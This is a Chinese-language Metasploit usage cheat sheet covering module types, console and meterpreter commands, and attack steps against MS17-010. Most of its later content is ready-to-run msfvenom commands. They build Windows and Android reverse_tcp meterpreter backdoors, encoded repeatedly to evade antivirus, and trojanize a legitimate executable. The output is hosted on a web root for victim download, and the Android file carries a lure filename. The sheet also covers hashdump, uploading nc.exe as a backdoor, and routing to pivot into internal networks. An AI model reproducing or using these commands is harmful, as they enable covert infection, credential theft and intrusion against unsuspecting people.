Metasploit的介绍及使用

体系框架：

渗透攻击模块（Exploits)：对目标进行漏洞攻击

辅助模块（Aux):用来进行扫描

后渗透攻击模块（Post):拿到权限以后进行更多操作攻击载荷模块（payloads)

攻击载荷模块（payloads)：建立连接（如：反弹shell）

编码器模块（Encoders)：做免杀

空指令模块（Nops)：

命令：

1.connect(可用于远程连接植入的后门)

 

 

2.其他命令：

show：targets（可用于攻击的目标）；payloads；options（需要设置的一些参数）等等

search：查找需要的模版

info：列出信息

use：使用模版

back：返回上一级

set：设置参数

services：查看数据库中的主机都开放了哪些服务（可用-R 49.232.106.183查看具体）

db_import:导入文件

hosts：(可用-d 49.232.106.183删除一个)

db_export -f xml：导出文件

creds：列出数据库中的所有凭据

jobs：显示和管理作业（可用-K清除所有后台）

kill：杀死一个工作

使用 metasploit 攻击的步骤：（可利用ms17-010永恒之蓝漏洞练习）

1、查找 CVE 公布的漏洞或使用辅助模块（Aux)用来进行扫描

2、查找对应的 exploit 模块并use使用

3、配置模块参数set

4、添加 payload 后门set payload

5、执行 exploit 开始攻击run

 

meterpreter命令：

1.hashdump:获取用户名和密码的哈希值。

2.shell：切换到shell（因为window编码不一样 会出现乱码 需要修改编码 ：chcp 65001）

3.getuid：查看自己的权限

4.upload：上传文件（一般用于留后门，如：上传nc.exe）

5.arp: 查看该内网中的其他主机

6.route:查看路由信息（检查有无其他网段,如果有则执行‘7’，然后扫面该网段内的其他主机并进行渗透）

7.route:命令添加路由，命令格式：route add 网段 子网掩码 sessionID

常用模块：

监听模块：exploit/multi/handler  --> 设置本地监听ip和端口号 --> 设置payload

 

生成木马软件：

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/木马软件.exe

 

参数说明：

-a 指定架构。 

--platform 指定平台，这里选择 windows，通过 --l platforms 可以查看所有支持的平台。

-p 设置攻击载荷，我们使用 windows/meterpreter/reverse_tcp，可以通过-l payloads 查看所有攻击载荷。

LHOST 目标主机执行程序后连接我们的地址。

LPORT 目标主机执行程序后连接我们的端口。

-b 去掉坏字符，坏字符会影响 payload 正常执行。

-e 指定编码器，也就是所谓的免杀，x86/shikata_ga_nai和x86/alpha_upper 是 msf 自带的编码器，可以通过 -l encoders 查看所有编码器。

-i 指定 payload 有效载荷编码迭代次数。 指定编码加密次数，为了让杀毒软件，更难查出源代码。

-f 指定生成格式，可以是 raw，exe，elf(Linux可执行文件)，jar，c 语言的，python 的，java 的……，用 -l formats 查看所有支持的格式。

-o 指定文件名称和导出位置。 指定到网站根目录/var/www/html，方便在肉机上下载后门程序。

 

对软件注入木马程序：

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -x QvodTerminal.exe -f exe -o /var/www/html/QvodTerminal.exe（使用-x参数）

 

安卓客户端恶意软件:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 R > 深夜福利.apk